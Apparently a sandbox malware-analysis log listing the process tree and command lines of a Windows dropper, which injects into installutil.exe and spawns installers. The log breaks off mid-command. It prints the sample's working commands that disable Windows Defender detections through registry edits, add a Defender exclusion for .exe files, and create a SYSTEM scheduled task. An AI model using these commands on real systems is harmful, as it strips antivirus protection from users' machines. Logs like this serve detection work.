PID 4704 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4704 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4704 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4704 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4704 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4704 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4704 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2916 wrote to memory of 4284 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe
PID 2916 wrote to memory of 4284 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe
PID 2916 wrote to memory of 2184 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
PID 2916 wrote to memory of 2184 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
PID 2916 wrote to memory of 2184 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe
PID 2184 wrote to memory of 4980 N/A C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
PID 2184 wrote to memory of 4980 N/A C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
PID 2184 wrote to memory of 4980 N/A C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
PID 2916 wrote to memory of 1416 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe
PID 2916 wrote to memory of 1416 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe
PID 2916 wrote to memory of 1416 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe
PID 1416 wrote to memory of 1668 N/A C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe
PID 1416 wrote to memory of 1668 N/A C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe
PID 1416 wrote to memory of 1668 N/A C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe
PID 1668 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe
PID 1668 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe
PID 1668 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe
PID 4800 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4800 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4800 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3024 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3024 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1564 wrote to memory of 4988 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 4988 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 4988 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4988 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4988 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4988 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 4940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3024 wrote to memory of 4940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3024 wrote to memory of 4940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4940 wrote to memory of 3768 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4940 wrote to memory of 3768 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4940 wrote to memory of 3768 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3768 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3768 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3768 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 4628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3024 wrote to memory of 4628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3024 wrote to memory of 4628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4628 wrote to memory of 724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4628 wrote to memory of 724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4628 wrote to memory of 724 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 724 wrote to memory of 5032 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 724 wrote to memory of 5032 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 724 wrote to memory of 5032 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 3172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3024 wrote to memory of 3172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3024 wrote to memory of 3172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3172 wrote to memory of 2708 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3172 wrote to memory of 2708 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3172 wrote to memory of 2708 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2708 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2708 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2708 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe

"C:\Users\Admin\AppData\Local\Temp\47069f002e03da24cb2ef04c19cce8f9.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe

"C:\Users\Admin\Pictures\SD3V9PvP2v9pKC5cnuKd9aPW.exe"

C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe

"C:\Users\Admin\Pictures\uwmmnHhLqAONFLP0yZ3zADwp.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3704,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2184 -ip 2184

C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2184 -ip 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 812

C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe

"C:\Users\Admin\Pictures\JN0WyMsswwbbFizvqZKXA14d.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 556

C:\Users\Admin\AppData\Local\Temp\7zS3B4.tmp\Install.exe

.\Install.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 596

C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe

.\Install.exe /aYXWdidSrinf "385118" /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 928

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1468

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bLaBYusGTeVzUnMcXL" /SC once /ST 18:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe\" Ao /RQNdidCfpK 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bLaBYusGTeVzUnMcXL"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bLaBYusGTeVzUnMcXL

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bLaBYusGTeVzUnMcXL

C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS887.tmp\Install.exe Ao /RQNdidCfpK 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 